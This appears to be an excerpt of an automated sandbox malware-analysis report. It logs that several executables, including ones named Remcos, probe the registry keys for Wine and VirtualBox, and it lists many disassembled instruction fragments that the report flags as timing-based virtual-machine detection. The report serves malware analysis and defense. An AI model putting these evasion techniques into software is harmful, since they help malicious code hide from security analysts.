Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\ProgramData\Remcos\remcos.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\Remcos\remcos.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\Remcos\remcos.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\Remcos\remcos.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\Remcos\remcos.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD6F75 second address: BD6F7B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD6F7B second address: BD6FA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F476474B51Ch 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b jmp 00007F476474B51Ch 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD6FA4 second address: BD6FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD6FAA second address: BD6FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD6FAF second address: BD6FC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBDCh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD61C0 second address: BD61F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F476474B529h 0x00000009 jc 00007F476474B516h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F476474B51Ah 0x00000019 push edi 0x0000001a push esi 0x0000001b pop esi 0x0000001c pop edi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD6585 second address: BD658A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD658A second address: BD65BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B527h 0x00000007 push edi 0x00000008 js 00007F476474B516h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 pushad 0x00000018 popad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD82A3 second address: BD82DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007F4764D9CBDEh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F4764D9CBE4h 0x00000016 mov eax, dword ptr [eax] 0x00000018 js 00007F4764D9CBDEh 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD835C second address: BD839D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F476474B51Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F476474B521h 0x00000012 push 00000000h 0x00000014 xor dword ptr [ebp+122D23F4h], esi 0x0000001a add esi, 0F0DEBE3h 0x00000020 push 2798A20Fh 0x00000025 push eax 0x00000026 push edx 0x00000027 push ebx 0x00000028 jnp 00007F476474B516h 0x0000002e pop ebx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD839D second address: BD83A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD83A2 second address: BD8419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F476474B516h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 2798A28Fh 0x00000014 sub dh, 0000005Eh 0x00000017 push 00000003h 0x00000019 jmp 00007F476474B525h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 pop edi 0x00000022 push 00000003h 0x00000024 push 8DD5963Fh 0x00000029 jne 00007F476474B528h 0x0000002f xor dword ptr [esp], 4DD5963Fh 0x00000036 mov dword ptr [ebp+122D1FD4h], ecx 0x0000003c lea ebx, dword ptr [ebp+1244E1C1h] 0x00000042 mov si, D907h 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 jnc 00007F476474B51Ch 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD8419 second address: BD8432 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F4764D9CBD6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F4764D9CBD8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD8432 second address: BD8438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD8438 second address: BD843C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD8491 second address: BD84A5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F476474B516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD84A5 second address: BD8521 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D2C3Ch], eax 0x0000000f push 00000000h 0x00000011 jmp 00007F4764D9CBDFh 0x00000016 call 00007F4764D9CBD9h 0x0000001b jmp 00007F4764D9CBE7h 0x00000020 push eax 0x00000021 jmp 00007F4764D9CBDDh 0x00000026 mov eax, dword ptr [esp+04h] 0x0000002a jne 00007F4764D9CBE8h 0x00000030 mov eax, dword ptr [eax] 0x00000032 push edx 0x00000033 push edi 0x00000034 push esi 0x00000035 pop esi 0x00000036 pop edi 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 push esi 0x00000041 pop esi 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD8521 second address: BD8531 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B51Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD8531 second address: BD85BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F4764D9CBD6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f je 00007F4764D9CBE4h 0x00000015 jmp 00007F4764D9CBDEh 0x0000001a mov edx, dword ptr [ebp+122D36B9h] 0x00000020 push 00000003h 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F4764D9CBD8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000018h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c push 00000000h 0x0000003e mov dword ptr [ebp+122D202Fh], ebx 0x00000044 push 00000003h 0x00000046 push 00000000h 0x00000048 push ecx 0x00000049 call 00007F4764D9CBD8h 0x0000004e pop ecx 0x0000004f mov dword ptr [esp+04h], ecx 0x00000053 add dword ptr [esp+04h], 00000016h 0x0000005b inc ecx 0x0000005c push ecx 0x0000005d ret 0x0000005e pop ecx 0x0000005f ret 0x00000060 call 00007F4764D9CBD9h 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F4764D9CBDEh 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCA4D7 second address: BCA4DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF7FB5 second address: BF7FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4764D9CBDDh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF85D4 second address: BF85D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF85D8 second address: BF85FF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4764D9CBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F4764D9CBEDh 0x00000010 jmp 00007F4764D9CBE5h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF88E0 second address: BF88EC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF88EC second address: BF88F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF88F2 second address: BF8906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F476474B51Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8A41 second address: BF8A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4764D9CBD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBE846 second address: BBE858 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B51Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF94E4 second address: BF9510 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4764D9CBD6h 0x00000008 jmp 00007F4764D9CBE8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F4764D9CBDAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF968D second address: BF9691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF9838 second address: BF983C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF9C46 second address: BF9C56 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F476474B516h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF9C56 second address: BF9C6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBE2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFCF00 second address: BFCF1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F476474B520h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFCF1A second address: BFCF1F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB852 second address: BFB856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB856 second address: BFB85A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB85A second address: BFB864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFB864 second address: BFB868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C06EAF second address: C06EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C06EB9 second address: C06EDD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F4764D9CBE6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07077 second address: C07084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F476474B516h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07231 second address: C07243 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4764D9CBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07243 second address: C07247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07247 second address: C0724D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07AA5 second address: C07AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07AAA second address: C07AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F4764D9CBD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07AB4 second address: C07AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07AB8 second address: C07AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F4764D9CBE0h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07D76 second address: C07D7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07D7C second address: C07D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07F32 second address: C07F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F476474B516h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07F3D second address: C07F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07F43 second address: C07F6C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F476474B516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F476474B528h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07F6C second address: C07F88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07F88 second address: C07F9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F476474B520h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C09E42 second address: C09E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C09E46 second address: C09E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F476474B51Bh 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0A53E second address: C0A542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0A542 second address: C0A55B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F476474B516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F476474B51Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0ACF7 second address: C0AD1D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4764D9CBD8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f jmp 00007F4764D9CBDAh 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4764D9CBDAh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0EAD0 second address: C0EAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0EAD4 second address: C0EAD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0EAD8 second address: C0EADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0EADE second address: C0EB6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov esi, dword ptr [ebp+122D36E5h] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F4764D9CBD8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c jmp 00007F4764D9CBE8h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007F4764D9CBD8h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d sub dword ptr [ebp+122D1974h], eax 0x00000053 xchg eax, ebx 0x00000054 jbe 00007F4764D9CBF1h 0x0000005a push eax 0x0000005b push edx 0x0000005c push esi 0x0000005d pop esi 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0F416 second address: C0F44B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F476474B522h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C10272 second address: C10278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0FF20 second address: C0FF24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C10278 second address: C1027C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0FF24 second address: C0FF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0FF2D second address: C0FF46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4764D9CBDEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C133A7 second address: C133AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCF3D3 second address: BCF3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4764D9CBD6h 0x0000000a jmp 00007F4764D9CBDBh 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCF3EC second address: BCF3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
